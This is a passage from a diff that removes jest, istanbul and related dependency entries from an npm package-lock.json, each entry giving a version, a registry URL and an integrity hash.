"sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true - }, - "html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", - "requires": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - } - }, - "human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true - }, - "import-local": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/import-local/-/import-local-3.1.0.tgz", - "integrity": "sha512-ASB07uLtnDs1o6EHjKpX34BKYDSqnFerfTOJL2HvMqF70LnxpjkzDB8J44oT9pu4AMPkQwf8jl6szgvNd2tRIg==", - "dev": true, - "requires": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - } - }, - "imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha1-khi5srkoojixPcT7a21XbyMUU+o=", - "dev": true - }, - "inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha1-Sb1jMdfQLQwJvJEKEHW6gWW1bfk=", - "requires": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" - }, - "is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "is-core-module": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.5.0.tgz", - "integrity": "sha512-TXCMSDsEHMEEZ6eCA8rwRDbLu55MRGmrctljsBX/2v1d9/GzqHOxW5c5oPSgrUt2vBFXebu9rGqckXGPWOlYpg==", - "dev": true, - "requires": { - "has": "^1.0.3" - } - }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", - "dev": true - }, - "is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true - }, - "is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true - }, - "is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true - }, - "is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=" - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha1-6PvzdNxVb/iUehDcsFctYz8s+hA=", - "dev": true - }, - "isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "requires": {} - }, - "isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=" - }, - "istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true - }, - "istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "requires": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - } - }, - "istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "requires": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - } - }, - "istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "requires": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - } - }, - "istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "requires": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - } - }, - "jest": { - "version": "29.3.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.3.1.tgz", - "integrity": "sha512-6iWfL5DTT0Np6UYs/y5Niu7WIfNv/wRTtN5RSXt2DIEft3dx3zPuw/3WJQBCJfmEzvDiEKwoqMbGD9n49+qLSA==", - "dev": true, - "requires": { - "@jest/core": "^29.3.1", - "@jest/types": "^29.3.1", - "import-local": "^3.0.2", - "jest-cli": "^29.3.1" - } - }, - "jest-changed-files": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.4.0.tgz", - "integrity": "sha512-rnI1oPxgFghoz32Y8eZsGJMjW54UlqT17ycQeCEktcxxwqqKdlj9afl8LNeO0Pbu+h2JQHThQP0BzS67eTRx4w==", - "dev": true, - "requires": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - }, - "dependencies": { - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "requires": { - "yocto-queue": "^0.1.0" - } - } - } - }, - "jest-circus": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.4.1.tgz", - "integrity": "sha512-v02NuL5crMNY4CGPHBEflLzl4v91NFb85a+dH9a1pUNx6Xjggrd8l9pPy4LZ1VYNRXlb+f65+7O/MSIbLir6pA==", - "dev": true, - "requires": { - "@jest/environment": "^29.4.1", - "@jest/expect": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.4.1", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "dependencies": { - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "requires": { - "yocto-queue": "^0.1.0" - } - } - } - }, - "jest-cli": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.4.1.tgz", - "integrity": "sha512-jz7GDIhtxQ37M+9dlbv5K+/FVcIo1O/b1sX3cJgzlQUf/3VG25nvuWzlDC4F1FLLzUThJeWLu8I7JF9eWpuURQ==", - "dev": true, - "requires": { - "@jest/core": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - } - }, - "jest-config": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.4.1.tgz", - "integrity": "sha512-g7p3q4NuXiM4hrS4XFATTkd+2z0Ml2RhFmFPM8c3WyKwVDNszbl4E7cV7WIx1YZeqqCtqbtTtZhGZWJlJqngzg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.4.1", - "@jest/types": "^29.4.1", - "babel-jest": "^29.4.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.4.1", - "jest-environment-node": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-runner": "^29.4.1", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "dependencies": { - "@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - } - }, - "babel-jest": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.4.1.tgz", - "integrity": "sha512-xBZa/pLSsF/1sNpkgsiT3CmY7zV1kAsZ9OxxtrFqYucnOuRftXAfcJqcDVyOPeN4lttWTwhLdu0T9f8uvoPEUg==", - "dev": true, - "requires": { - "@jest/transform": "^29.4.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.4.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - } - }, - "babel-plugin-jest-hoist": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.4.0.tgz", - "integrity": "sha512-a/sZRLQJEmsmejQ2rPEUe35nO1+C9dc9O1gplH1SXmJxveQSRUYdBk8yGZG/VOUuZs1u2aHZJusEGoRMbhhwCg==", - "dev": true, - "requires": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - } - }, - "babel-preset-jest": { - "version": "29.4.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.4.0.tgz", - "integrity": "sha512-fUB9vZflUSM3dO/6M2TCAepTzvA4VkOvl67PjErcrQMGt9Eve7uazaeyCZ2th3UtI7ljpiBJES0F7A1vBRsLZA==", - "dev": true, - "requires": { - "babel-plugin-jest-hoist": "^29.4.0", - "babel-preset-current-node-syntax": "^1.0.0" - } - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true - }, - "jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true - }, - "jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - } - }, - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "write-file-atomic": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/write-file-atomic/-/write-file-atomic-5.0.0.tgz", - "integrity": "sha512-R7NYMnHSlV42K54lwY9lvW6MnSm1HSJqZL3xiSgi9E7//FYaI74r2G0rd+/X6VAMkHEdzxQaU5HUOXWUz5kA/w==", - "dev": true, - "requires": { - "imurmurhash": "^0.1.4", - "signal-exit": "^3.0.7" - } - } - } - }, - "jest-docblock": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.2.0.tgz", - "integrity": "sha512-bkxUsxTgWQGbXV5IENmfiIuqZhJcyvF7tU4zJ/7ioTutdz4ToB5Yx6JOFBpgI+TphRY4lhOyCWGNH/QFQh5T6A==", - "dev": true, - "requires": { - "detect-newline": "^3.0.0" - } - }, - "jest-each": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.4.1.tgz", - "integrity": "sha512-QlYFiX3llJMWUV0BtWht/esGEz9w+0i7BHwODKCze7YzZzizgExB9MOfiivF/vVT0GSQ8wXLhvHXh3x2fVD4QQ==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.2.0", - "jest-util": "^29.4.1", - "pretty-format": "^29.4.1" - }, - "dependencies": { - "jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true - } - } - }, - "jest-environment-node": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.4.1.tgz", - "integrity": "sha512-x/H2kdVgxSkxWAIlIh9MfMuBa0hZySmfsC5lCsWmWr6tZySP44ediRKDUiNggX/eHLH7Cd5ZN10Rw+XF5tXsqg==", - "dev": true, - "requires": { - "@jest/environment": "^29.4.1", - "@jest/fake-timers": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-mock": "^29.4.1", - "jest-util": "^29.4.1" - } - }, - "jest-leak-detector": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.4.1.tgz", - "integrity": "sha512-akpZv7TPyGMnH2RimOCgy+hPmWZf55EyFUvymQ4LMsQP8xSPlZumCPtXGoDhFNhUE2039RApZkTQDKU79p/FiQ==", - "dev": true, - "requires": { - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - }, - "dependencies": { - "jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true - } - } - }, - "jest-matcher-utils": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.4.1.tgz", - "integrity": "sha512-k5h0u8V4nAEy6lSACepxL/rw78FLDkBnXhZVgFneVpnJONhb2DhZj/Gv4eNe+1XqQ5IhgUcqj745UwH0HJmMnA==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^29.4.1", - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - }, - "dependencies": { - "diff-sequences": { - "version": "29.3.1", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.3.1.tgz", - "integrity": "sha512-hlM3QR272NXCi4pq+N4Kok4kOp6EsgOM3ZSpJI7Da3UAs+Ttsi8MRmB6trM/lhyzUxGfOgnpkHtgqm5Q/CTcfQ==", - "dev": true - }, - "jest-diff": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.4.1.tgz", - "integrity": "sha512-uazdl2g331iY56CEyfbNA0Ut7Mn2ulAG5vUaEHXycf1L6IPyuImIxSz4F0VYBKi7LYIuxOwTZzK3wh5jHzASMw==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.3.1", - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - } - }, - "jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true - } - } - }, - "jest-message-util": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.4.1.tgz", - "integrity": "sha512-H4/I0cXUaLeCw6FM+i4AwCnOwHRgitdaUFOdm49022YD5nfyr8C/DrbXOBEyJaj+w/y0gGJ57klssOaUiLLQGQ==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.4.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-mock": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.4.1.tgz", - "integrity": "sha512-MwA4hQ7zBOcgVCVnsM8TzaFLVUD/pFWTfbkY953Y81L5ret3GFRZtmPmRFAjKQSdCKoJvvqOu6Bvfpqlwwb0dQ==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-util": "^29.4.1" - } - }, - "jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "requires": {} - }, - "jest-resolve": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.4.1.tgz", - "integrity": "sha512-j/ZFNV2lm9IJ2wmlq1uYK0Y/1PiyDq9g4HEGsNTNr3viRbJdV+8Lf1SXIiLZXFvyiisu0qUyIXGBnw+OKWkJwQ==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "dependencies": { - "jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true - }, - "jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - } - }, - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "jest-resolve-dependencies": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.4.1.tgz", - "integrity": "sha512-Y3QG3M1ncAMxfjbYgtqNXC5B595zmB6e//p/qpA/58JkQXu/IpLDoLeOa8YoYfsSglBKQQzNUqtfGJJT/qLmJg==", - "dev": true, - "requires": { - "jest-regex-util": "^29.2.0", - "jest-snapshot": "^29.4.1" - }, - "dependencies": { - "jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true - } - } - }, - "jest-runner": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.4.1.tgz", - "integrity": "sha512-8d6XXXi7GtHmsHrnaqBKWxjKb166Eyj/ksSaUYdcBK09VbjPwIgWov1VwSmtupCIz8q1Xv4Qkzt/BTo3ZqiCeg==", - "dev": true, - "requires": { - "@jest/console": "^29.4.1", - "@jest/environment": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.2.0", - "jest-environment-node": "^29.4.1", - "jest-haste-map": "^29.4.1", - "jest-leak-detector": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-resolve": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-util": "^29.4.1", - "jest-watcher": "^29.4.1", - "jest-worker": "^29.4.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "dependencies": { - "@jest/transform": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.4.1.tgz", - "integrity": "sha512-5w6YJrVAtiAgr0phzKjYd83UPbCXsBRTeYI4BXokv9Er9CcrH9hfXL/crCvP2d2nGOcovPUnlYiLPFLZrkG5Hg==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.4.1", - "@jridgewell/trace-mapping": "^0.3.15", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^5.0.0" - } - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": 